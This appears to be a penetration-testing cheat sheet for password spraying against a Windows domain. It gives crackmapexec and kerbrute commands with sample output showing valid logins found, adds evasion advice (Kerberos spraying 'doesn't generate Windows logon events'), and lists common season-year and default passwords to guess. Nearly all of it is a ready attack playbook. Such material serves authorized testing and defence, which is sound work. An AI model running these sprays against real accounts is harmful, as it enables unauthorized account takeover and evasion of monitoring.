PASSWORD SPRAYING

Spray with crackmapexec

One password, all users — Check lockout policy first

crackmapexec smb <DC_IP> -u users.txt -p 'Password1' --continue-on-success
Example Output
crackmapexec smb 10.10.10.5 -u users.txt -p 'Winter2025'
SMB  10.10.10.5  445  DC01  [-] corp\administrator:Winter2025
SMB  10.10.10.5  445  DC01  [-] corp\john.smith:Winter2025
SMB  10.10.10.5  445  DC01  [+] corp\jane.doe:Winter2025
(FOUND VALID CREDS)

Spray with kerbrute

Kerberos-based spray — Stealthier than SMB

kerbrute passwordspray -d <domain> users.txt 'Password1' --dc <DC_IP>
Example Output
kerbrute passwordspray -d corp.local users.txt 'Winter2025' --dc 10.10.10.5
[+] VALID LOGIN: jane.doe@corp.local:Winter2025
(Kerberos-based, doesn't generate Windows logon events)

Common passwords to try

Predictable patterns — Match complexity requirements

Password1, Welcome1, <Season><Year> (Winter2025), <Company>1, Password123, Changeme1
Example Output
Password1     <- most common
Welcome1      <- second most common
Winter2025    <- current season + year
Corp2025!     <- company name + year
Changeme1     <- default reset password
(Match password policy: 7+ chars, uppercase, number)